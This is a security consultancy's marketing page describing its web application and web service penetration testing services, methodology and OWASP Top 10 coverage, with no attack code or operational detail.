Web Application Testing

Expert web application testing CREST and CESG CHECK security consultants.

Nettitude provides cutting edge advice and guidance on how to improve the security of your web application software through our specialist web application testing consultants. Through using manual security testing we are able to identify vulnerabilities across all of the OWASP Top 10. We also provide much deeper application logic assessments and assurance for applications hosted internally as well in the cloud. In many instances, we provide software development guidance to fix application vulnerabilities or write input validation controls to protect the environment from malicious internet users.

Looking for web application testing services?

As the number of internet web pages exceeds 50 billion, it is evident that more and more data is being taken online. With the advent of BIG data, organisations are able to capture information across a vast array of resources. From capturing analytics on users spending patterns through to tracking users ‘likes’, BIG data is transforming our ability to work, play and communicate.

The uniform approach for presenting this data is through a web browsers or web enabled app. Vulnerabilities such as Heartbleed have required IT professionals to take a deeper look at the way data is secured. As applications become more complex and deliver more functionality to users, so the opportunity for vulnerability become all the more prevalent and the need for web application testing becomes essential to protect the software IP, the users information and the reputation of the product owner.

What can you expect from a professional tester?

Nettitude’s web application assessments are designed to review all types of web server, ranging from straight forward wordpress sites through to online banking environments or even control systems for critical national infrastructure. Nettitude focuses on looking at the application logic that has been built in to the website and pays particular attention to any aspect of the environment that allows a user to enter input. As well as having some of the most sort after technical capability within the space, our consultants all poses strong communication skills and can help quantify the risks associated with your web application infrastructure.

What will the test cover?

Web server tests will assess an environment for server side attacks such as SQL injection and blind SQL injection. In addition tests will assess an environment for client side attacks, such as cross site scripting exposures which could allow an attacker to manipulate the clients that access your infrastructure. Nettitude will assess the design of a web infrastructure, including the use of cookies and log-in forms and the way data is encrypted. It will also assess how content is displayed and the error messages that are displayed when invalid pages, commands or input is entered into the environment.

Professional Guidance

Nettitude can provide advice and guidance on how you can improve the security of your web application software. In many instances, we can provide software development services to fix application logic or write input validation controls to protect the environment from malicious internet users.

We can provide comprehensive testing of web 2.0 environments that make extensive use of AJAX and flash. Nettitude also deliver tests that assess fat clients and applications developed for mobile devices. Nettitude is a CREST certified organisation with web application certified consultants delivering end-to-end web app testing.

Our Web Application Testing Methodology

Nettitude’s web application testing methodology is consistent with the testing methodology for infrastructure based IT penetration tests. In addition, there are further elements conducted as part of the mapping, service identification, vulnerability assessment and exploitation phases.

Nettitude uses a blended approach of Open Source (OS), custom scripts and commercial tools to conduct web application testing. All of our testing is inline with OWASP v4 (2014) recommendations and covers the OWASP Top 10 as a minimum.

As part of a web application test, Nettitude will assess the following elements:

Application Re-Engineering

Authentication Assessment

Session Management

Input Manipulation

Output Manipulation

Information Leakage

Code Review

Web Service & API Testing

  • Approach to testing

    Nettitude tests web services through manipulation of parameters identified in their configuration files. These files provide a roadmap of the types of Simple Object Access Protocol (SOAP) requests that a web service is configured to respond to. Web services can still be susceptible to Structured Query Language (SQL), Lightweight Directory Access Protocol (LDAP), Operating System (OS) and Extensible Markup Pathway Language (XPATH) injection, blind injection and buffer overflows. XML based resources are frequently configured without any form of access control. As a consequence, if a web service allows user input to be included in an query, then it becomes a strong target for an injection based attack.

  • Web servers can be a gateway for attacks

    Due to the fact that many web services provide critical business functions, this makes them a strong target for Internet attackers. Web services can also be attacks outside of the WSDL configuration file. It is possible to conduct authentication based attacks, XML structural attacks, XML content-level attacks, HTTP GET parameter/REST attacks and SOAP attachment attacks. All of these attack vectors can allow an attacker to gain access to privileged data and even gain root/administrator access to underlying resources.

  • Web server tests

    Nettitude provides web service testing for Apache Axis/Azis2, Zend, Microsoft WCF and Silverlight. We can also test BPEL services, WCF, REST, SOAP over HTTP, SOAP over TCP and SOAP over MQ.

    Nettitude provide web service penetration testing based on proven methodologies and techniques. Using a series of commercial tools, open source tools and in-house built scripts, Nettitude’s security testers provide security testing techniques that identify your security vulnerabilities before Internet hackers find them. Web service penetration testing requires appropriate scoping. As a consequence, it is always appropriate to undertake diligent scoping to ensure that web service assessments are conducted in accordance with client requirements.

Open Web Application Security Project (OWASP)

The OWASP top 10 is a list of the most common types of security issues that impact web applications. It is referenced by many security standards including PCI DSS, Defence Industry Security Association (DISA)MITREFederal Trade Commission (FTC) and more.

All of Nettitude’s web application and penetration testing engagements cover the OWASP top 10 and are consistent with their v4 (2014) testing guide. In addition, Nettitude goes deeper to assess the fundamental application logic, whilst also assessing the access controls that deliver security roles and user partitioning.

Nettitude also pulls in information from external sources such as Facebook, LinkedIn and Twitter, to provide social engineering and authentication based attacks vectors. Combining these approaches together provides customers with a much more holistic approach to web application security testing.

Nettitude carries out Web Application Testing to assess the following elements of the OWASP Top 10:

A1: Injection

A2: Broken Authentication and Session Management

A3: Cross-Site Scripting (XSS)

A4: Insecure Direct Object References

A5: Security Misconfiguration (CSRF)

A6: Sensitive Data Exposure

A7: Missing Function Level Access Control

A8: Cross-Site Request Forgery (CSRF)

A9: Using Components with Known Vulnerabilities

A10: Unvalidated Redirects and Forwards

The OWASP top 10 is a strong starting point for web application testing, but organisations should really look to go beyond this. The underlying application logic needs to be tested. Websites need to be assessed with different classes of users, to ensure that appropriate partitioning and access controls exist. Content Management Systems (CMS) and administrative functions should be assessed and a series of broader controls should be reviewed and tested.

Web Application Testing Experience

Nettitude has tested a vast range of applications, from internal applications to external applications delivered over the internet and by mobile/cell phone.

Nettitude has tested a vast range of applications, from internal applications to external applications delivered over the internet and by mobile/cell phone.

Some of the applications Nettitude has tested include:

Mail applications (Exchange, Domino, Groupwise, Bespoke)

CRM applications

Databases (Sybase, DB2, Oracle, Postgres, MySQL, Microsoft SQL, Hadoop, Mongodb)

ERP applications (Peoplesoft, Oracle, SAP)

Financials (Oracle, Sage)

Operating Systems (Windows, Linux, Solaris, AIX, OS400, Novell, Apple, Mainframe derivatives)

IP Telephony (Cisco, Mitel, Alcatel, Nortel, BT, Avaya, SIP based services)

Numerous custom applications in Banking, Insurance, Retail and Manufacturing sectors

Web applications and Web services

Mobile Telephony applications

Apple iOS and Google android based apps

Wireless environments

Critical infrastructure applications

Smart meters

Intelligent Cyber Security and Risk Management   0345 5200 085    solutions@nettitude.co.uk